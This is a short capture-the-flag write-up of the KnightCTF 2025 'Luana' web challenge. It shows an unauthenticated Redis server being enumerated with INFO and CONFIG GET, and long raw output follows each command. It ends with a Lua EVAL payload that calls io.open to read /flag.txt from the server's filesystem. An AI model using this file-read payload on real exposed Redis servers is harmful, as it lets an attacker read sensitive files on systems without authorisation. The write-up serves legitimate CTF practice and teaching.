CTFtime.org

Luana

by rxx2me / Nc{Cat}

Tags: web 

Rating:

name : Luana
des :
Show me your skills. Read the /flag.txt

Flag Format: KCTF{Fl4G_HeRe}

Do not use any automation tools. The server will reset in every 5 minutes.

open url :

![image](https://github.com/user-attachments/assets/54f13754-7a22-41fa-88e5-7216c443196f)

find port

open with :

```
redis-cli -h 172.105.121.246 -p 6379
```

and print "INFO "

```
└─$ redis-cli -h 172.105.121.246 -p 6379
172.105.121.246:6379> info
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:636cde3b5c7a3923
redis_mode:standalone
os:Linux 6.8.0-51-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.2.1
process_id:7
run_id:2b0cf4f1beef91d6681523e033e5a79306c41f1c
tcp_port:6379
uptime_in_seconds:51
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:9377902
executable:/tmp/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:5
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0

# Memory
used_memory:943144
used_memory_human:921.04K
used_memory_rss:7684096
used_memory_rss_human:7.33M
used_memory_peak:943144
used_memory_peak_human:921.04K
used_memory_peak_perc:100.11%
used_memory_overhead:914934
used_memory_startup:797224
used_memory_dataset:28210
used_memory_dataset_perc:19.33%
allocator_allocated:1636440
allocator_active:1937408
allocator_resident:10731520
total_system_memory:1008324608
total_system_memory_human:961.61M
used_memory_lua:52224
used_memory_lua_human:51.00K
used_memory_scripts:328
used_memory_scripts_human:328B
number_of_cached_scripts:1
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.18
allocator_frag_bytes:300968
allocator_rss_ratio:5.54
allocator_rss_bytes:8794112
rss_overhead_ratio:0.72
rss_overhead_bytes:-3047424
mem_fragmentation_ratio:8.53
mem_fragmentation_bytes:6782960
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:117382
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1737431099
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:5
total_commands_processed:16
instantaneous_ops_per_sec:0
total_net_input_bytes:690
total_net_output_bytes:57754
instantaneous_input_kbps:0.03
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:e0908287556b3396dc3978afa770e85ab238791f
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.052646
used_cpu_user:0.036253
used_cpu_sys_children:0.001432
used_cpu_user_children:0.000858

# Cluster
cluster_enabled:0

# Keyspace
172.105.121.246:6379> CONFIG GET *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "cluster-announce-ip"
8) ""
9) "unixsocket"
10) ""
11) "logfile"
12) "/dev/stdout"
13) "pidfile"
14) "/var/run/redis/redis-server.pid"
15) "slave-announce-ip"
16) ""
17) "replica-announce-ip"
18) ""
19) "maxmemory"
20) "0"
21) "proto-max-bulk-len"
22) "536870912"
23) "client-query-buffer-limit"
24) "1073741824"
25) "maxmemory-samples"
26) "5"
27) "lfu-log-factor"
28) "10"
29) "lfu-decay-time"
30) "1"
31) "timeout"
32) "0"
33) "active-defrag-threshold-lower"
34) "10"
35) "active-defrag-threshold-upper"
36) "100"
37) "active-defrag-ignore-bytes"
38) "104857600"
39) "active-defrag-cycle-min"
40) "5"
41) "active-defrag-cycle-max"
42) "75"
43) "active-defrag-max-scan-fields"
44) "1000"
45) "auto-aof-rewrite-percentage"
46) "100"
47) "auto-aof-rewrite-min-size"
48) "67108864"
49) "hash-max-ziplist-entries"
50) "512"
51) "hash-max-ziplist-value"
52) "64"
53) "stream-node-max-bytes"
54) "4096"
55) "stream-node-max-entries"
56) "100"
57) "list-max-ziplist-size"
58) "-2"
59) "list-compress-depth"
60) "0"
61) "set-max-intset-entries"
62) "512"
63) "zset-max-ziplist-entries"
64) "128"
65) "zset-max-ziplist-value"
66) "64"
67) "hll-sparse-max-bytes"
68) "3000"
69) "lua-time-limit"
70) "5000"
71) "slowlog-log-slower-than"
72) "10000"
73) "latency-monitor-threshold"
74) "0"
75) "slowlog-max-len"
76) "128"
77) "port"
78) "6379"
79) "cluster-announce-port"
80) "0"
81) "cluster-announce-bus-port"
82) "0"
83) "tcp-backlog"
84) "511"
85) "databases"
86) "16"
87) "repl-ping-slave-period"
88) "10"
89) "repl-ping-replica-period"
90) "10"
91) "repl-timeout"
92) "60"
93) "repl-backlog-size"
94) "1048576"
95) "repl-backlog-ttl"
96) "3600"
97) "maxclients"
98) "10000"
99) "watchdog-period"
100) "0"
101) "slave-priority"
102) "100"
103) "replica-priority"
104) "100"
105) "slave-announce-port"
106) "0"
107) "replica-announce-port"
108) "0"
109) "min-slaves-to-write"
110) "0"
111) "min-replicas-to-write"
112) "0"
113) "min-slaves-max-lag"
114) "10"
115) "min-replicas-max-lag"
116) "10"
117) "hz"
118) "10"
119) "cluster-node-timeout"
120) "15000"
121) "cluster-migration-barrier"
122) "1"
123) "cluster-slave-validity-factor"
124) "10"
125) "cluster-replica-validity-factor"
126) "10"
127) "repl-diskless-sync-delay"
128) "5"
129) "tcp-keepalive"
130) "300"
131) "cluster-require-full-coverage"
132) "yes"
133) "cluster-slave-no-failover"
134) "no"
135) "cluster-replica-no-failover"
136) "no"
137) "no-appendfsync-on-rewrite"
138) "no"
139) "slave-serve-stale-data"
140) "yes"
141) "replica-serve-stale-data"
142) "yes"
143) "slave-read-only"
144) "yes"
145) "replica-read-only"
146) "yes"
147) "slave-ignore-maxmemory"
148) "yes"
149) "replica-ignore-maxmemory"
150) "yes"
151) "stop-writes-on-bgsave-error"
152) "yes"
153) "daemonize"
154) "no"
155) "rdbcompression"
156) "yes"
157) "rdbchecksum"
158) "yes"
159) "activerehashing"
160) "yes"
161) "activedefrag"
162) "no"
163) "protected-mode"
164) "no"
165) "repl-disable-tcp-nodelay"
166) "no"
167) "repl-diskless-sync"
168) "no"
169) "aof-rewrite-incremental-fsync"
170) "yes"
171) "rdb-save-incremental-fsync"
172) "yes"
173) "aof-load-truncated"
174) "yes"
175) "aof-use-rdb-preamble"
176) "yes"
177) "lazyfree-lazy-eviction"
178) "no"
179) "lazyfree-lazy-expire"
180) "no"
181) "lazyfree-lazy-server-del"
182) "no"
183) "slave-lazy-flush"
184) "no"
185) "replica-lazy-flush"
186) "no"
187) "dynamic-hz"
188) "yes"
189) "maxmemory-policy"
190) "noeviction"
191) "loglevel"
192) "notice"
193) "supervised"
194) "no"
195) "appendfsync"
196) "everysec"
197) "syslog-facility"
198) "local0"
199) "appendonly"
200) "no"
201) "dir"
202) "/root"
203) "save"
204) "900 1 300 10 60 10000"
205) "client-output-buffer-limit"
206) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
207) "unixsocketperm"
208) "0"
209) "slaveof"
210) ""
211) "notify-keyspace-events"
212) ""
213) "bind"
214) "0.0.0.0"
172.105.121.246:6379>
```
Ok then try to read flag.txt
```
EVAL "local f=io.open('/flag.txt', 'r'); local c=f:read('*a'); f:close(); return c" 0
```

![image](https://github.com/user-attachments/assets/64c0bd57-f8db-47d3-9f1b-8431eea07ddd)

Done ..

Original writeup (https://github.com/rxx2me/CTFs-Writeups/blob/main/KnightCTF%202025/web/Luana/README.md).

Comments